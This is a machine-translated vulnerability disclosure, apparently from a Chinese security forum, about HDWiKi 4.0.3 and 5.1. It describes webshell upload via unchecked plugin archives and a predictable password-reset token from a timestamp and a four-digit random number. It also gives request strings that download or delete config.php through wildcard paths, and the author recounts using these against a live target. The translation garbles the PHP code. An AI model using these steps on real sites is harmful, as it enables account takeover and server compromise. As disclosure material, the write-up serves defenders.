HDWiKi V4.0.3 and HDWiKi V5.1 background SHELL

Just a few days ago, the injection vulnerability of 5.1 exploded. When detecting a website, the other party found that HDWiKi V 4.0.3 was used by the other party. It seems that this version does not work for template writing on the Internet, after studying it, I found this WEBshell upload method!
For details, HDWiKi V 4.0.3 does not check the files in the compressed package when installing the plug-in online. You can put the horse in the compressed package and install it online!

 


 
After the installation, Ma is in the plug-in directory corresponding to plugins. You know how to find it!
 
HDWiki V5.1 is simple. There is a file management in the module! It can be uploaded directly!
 
 
 
 
 
The password retrieval link is predictable:
 
This is a little difficult. There are mainly two points: 1. You need to know the email address of the broken account; 2. You need to grasp the server timestamp accurately. The encyclopedia refresh itself. The cookie contains a 13-bit JAVA timestamp. I tested it several times and removed the last three digits. The accuracy is also different from that of PHP. There should be other methods found from the encyclopedia. I did not test it.
 
Code in control/user. php 5.1
 
$ Timetemp = date ("Y-m-d H: I: s", $ this-> time); // www.2cto.com Timestamp
$ Verification = rand (,); // 4-digit random number
$ Encryptstring = md5 ($ this-> time. $ verification );
$ Reseturl = WIKI_URL. "/index. php? User-getpass-". $ user ['uid']. '-'. $ encryptstring;
$ _ ENV ['user']-> update_getpass ($ user ['uid'], $ encryptstring );
 
The code in control/user. php of version 4.03 is as follows:
 
 
$ Timetemp = date ("Y-m-d h: I: s", $ this-> time );
While ($ verification = rand () % 10000) <1000 );
$ Encryptstring = md5 ($ this-> time. $ verification );
$ Reseturl = $ this-> setting ['site _ url']. "/index. php? User-getpass-". $ user ['uid']. '-'. $ encryptstring;
 
The method I found may be quite special, because the target station has a Discuz x2 forum. I clicked the software with the mouse and in almost one second, I clicked to retrieve the password and refreshed the forum post, use the timestamp in the Forum posts. The error is almost zero.
The four-digit random code is still very good, as shown below:
 
 
 
 
 
During this detection, the system also found that the background files of version 4.03 were randomly downloaded and deleted, requiring administrator privileges. Directory restrictions are not strict, but the small point is converted into a star number, the same is true for deleting files!
Index. php? Admin_db-downloadfile-/**/config * php download config. php
Index. php? Admin_db-remove-/**/config * php Delete config. php
 
Version 5.1 also exists, but 5.1 already has file management, which seems to be a lot of trouble. But it is also a defect!
 
 
Summary:
 
I have not tested the vulnerabilities I mentioned on the Internet. The main reason is that the vulnerabilities are truncated, but few vulnerabilities can be truncated now.
I also verified the vulnerability in uploading arbitrary files on the Internet. For 4.0.3 and 5.1, I did not verify 5.0,
The file is still detected, and the suffix cannot be broken through. It may be insufficient!
 
 
 
 
Proof of vulnerability: I have put the upload vulnerability in a detailed description.
The following code shows how to retrieve the password.
 
The code in control/user. php of version 4.03 is as follows:
 
 
$ Timetemp = date ("Y-m-d h: I: s", $ this-> time );
While ($ verification = rand () % 10000) <1000 );
$ Encryptstring = md5 ($ this-> time. $ verification );
$ Reseturl = $ this-> setting ['site _ url']. "/index. php? User-getpass-". $ user ['uid']. '-'. $ encryptstring;
 
Solution:

It seems that there are very few people using version 4.03. The manufacturer may not fix it. Upgrade the latest version!
The upload webshell of Version 5.1 is not a vulnerability. If it is used with injection, it will be very easy to use. Therefore, it is recommended that you set the administrator password to a high level and not go to the background, which is relatively safe!


Fish from Jiangnan